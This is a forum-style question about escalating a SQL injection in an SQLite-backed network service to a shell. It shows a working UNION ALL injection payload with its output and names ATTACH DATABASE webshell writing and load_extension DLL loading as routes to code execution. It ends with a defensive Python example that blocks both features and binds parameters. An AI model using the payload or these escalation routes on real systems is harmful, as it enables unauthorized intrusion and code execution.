I need to obtain a shell through an SQL injection in an application with an SQLite database.
Currently my exploit looks like the following:
lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9999-<><>-10.185.10.55:1101-<><>-OK
Input please:
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
Parsing results...
Customer information: Damy Roali qvzbqLOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzVqzzxq 42
lucian@0x90:~/$
Following this link http://atta.cked.me/home/sqlite3injectioncheatsheet I discovered that I can either use ATTACH DATABASE (by creating a .php file in the document root of a web folder) or load_extension (by loading a DLL file from an SMB path) in order to gain the shell.
Is this enabled by default in SQLite, or do I need to enable or check something?
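Seen from the application side, both features named in the question can be switched off per connection. The following is an added example, not part of the original post: it assumes the application uses Python's sqlite3 module (where extension loading stays off unless enable_load_extension(True) is called), and the table, column and function names are hypothetical.

```python
import sqlite3

# Action code for function calls; fall back to SQLite's documented value (31).
SQLITE_FUNCTION = getattr(sqlite3, "SQLITE_FUNCTION", 31)

def deny_risky_actions(action, arg1, arg2, db_name, source):
    """Authorizer callback, consulted by SQLite while a statement is compiled."""
    if action in (sqlite3.SQLITE_ATTACH, sqlite3.SQLITE_DETACH):
        return sqlite3.SQLITE_DENY
    # For SQLITE_FUNCTION the function name arrives in the second argument.
    if action == SQLITE_FUNCTION and (arg2 or "").lower() == "load_extension":
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK

def open_hardened(path=":memory:"):
    """Open a connection that refuses ATTACH/DETACH and load_extension()."""
    conn = sqlite3.connect(path)
    # Extension loading stays off: enable_load_extension(True) is never called.
    conn.set_authorizer(deny_risky_actions)
    return conn

def lookup_customer(conn, user_input):
    """Hypothetical lookup: the input is bound as a value, never spliced into SQL."""
    sql = "SELECT first_name, last_name FROM customers WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()

def is_blocked(conn, sql):
    """Return True if SQLite refuses to compile or run the statement."""
    try:
        conn.execute(sql).fetchall()
        return False
    except sqlite3.DatabaseError:
        return True

def make_demo_db():
    """Build a constructed in-memory database with one sample row."""
    conn = open_hardened()
    conn.execute("CREATE TABLE customers (id INTEGER, first_name TEXT, last_name TEXT)")
    conn.execute("INSERT INTO customers VALUES (1, 'Damy', 'Roali')")
    return conn

if __name__ == "__main__":
    db = make_demo_db()
    probe = "1 UNION ALL SELECT 42,'marker',42;-- x"  # constructed, same shape as the input above
    print(lookup_customer(db, "1"))
    print(lookup_customer(db, probe))
    print(is_blocked(db, "ATTACH DATABASE 'constructed.db' AS extra"))
    print(is_blocked(db, "SELECT load_extension('constructed')"))
```

With the bound parameter the UNION text is compared as a plain value and matches no row, and the authorizer rejects ATTACH before any file is created.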